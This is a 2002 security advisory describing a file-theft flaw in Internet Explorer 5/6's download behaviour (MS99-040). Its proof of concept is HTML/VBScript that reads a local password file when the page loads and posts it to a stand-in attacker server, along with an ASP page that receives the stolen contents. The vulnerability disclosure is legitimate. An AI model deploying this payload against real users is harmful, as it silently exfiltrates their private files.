** Digit-Labs Security Advisory (http://www.digit-labs.org/) **


Advisory Name: MS99-040 Exploit
Release Date: 18.3.2002
Application: Tested on IE5.0 & IE 6
Platform: Tested on Windows NT/XP
Severity: Medium
Author(s): GoLLuM.no [mailto:gollum@digit-labs.org]
Vendor Status: Known since way back in September 28, 1999 (MS99-040)


Executive Summary:
Microsoft posted a security bullitin on this way back in September 28, 
1999, it is still exploitable though if the html file is run from the 
users local disk and not from a webserver or file-share.

Microsoft does not tell you how it actually works, but
since I am a nice person I will share it with you people... :-)


Detailed Description:

>From Internet Explorer 5 and onwards have several implemented 
'Behaviours', one of these is the So-called "Download Behaviour" which
downloads a file and notifies a specified callback function when the 
download is complete. I does however have a security glitch that allows
for download of files directly from the clients computer without 
his/her knowledge, these file could very well be password files or any
other files that the client has access to. After the file is downloaded
it can be posted to a server without the users knowledge. The danger is
in someone mailing you an attached html-page that you open and then 
steals some files from you. Before the V5 patch this exploit would work
from a Web-server too.


Proof-of-concept:
  1.Create a file on your hardisk called c:\passwords.pwd
  2.Place the text "ginger:eqweqw234qwe213:Ginger Lynn:::" in the new
    file
  3.Create a new html-file somewhere on you PC (not on a web-server or
    fileshare) and call it download.htm
  4.Place the following content in the html-file you just created:

<HTML XMLNS:IE>
<IE:DOWNLOAD ID="oDownload" STYLE="behavior:url(#default#download)" />
<SCRIPT LANGUAGE="vbscript">
    Function onDownloadDone(s) 
        document.all.obj.value="a" & s
        document.all.myform.submit()
      End Function
      </SCRIPT>
      <body onload="vbscript:oDownload.startDownload 
      'file:///c:/passwords.pwd', GetRef('onDownloadDone')">
      <form id="myform" action="http://www.yourserver.C0M/test.asp" 
      method="post">
      <input type="hidden" value="oldval" id="obj" name="obj">
      </form>
      </body>

  5.Create a file on a webserver to recive the stolen file called test.asp
    and put the following in it if using ASP:

    <html>
    <head></head>
    <body>
    Stolen password file:
    <br>
    <%
    response.write request.form("obj")
    %>
    </body>
    </html>

  6.Run the html-file to test the exploit.

See also:
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/security/bulletin/ms99-040.asp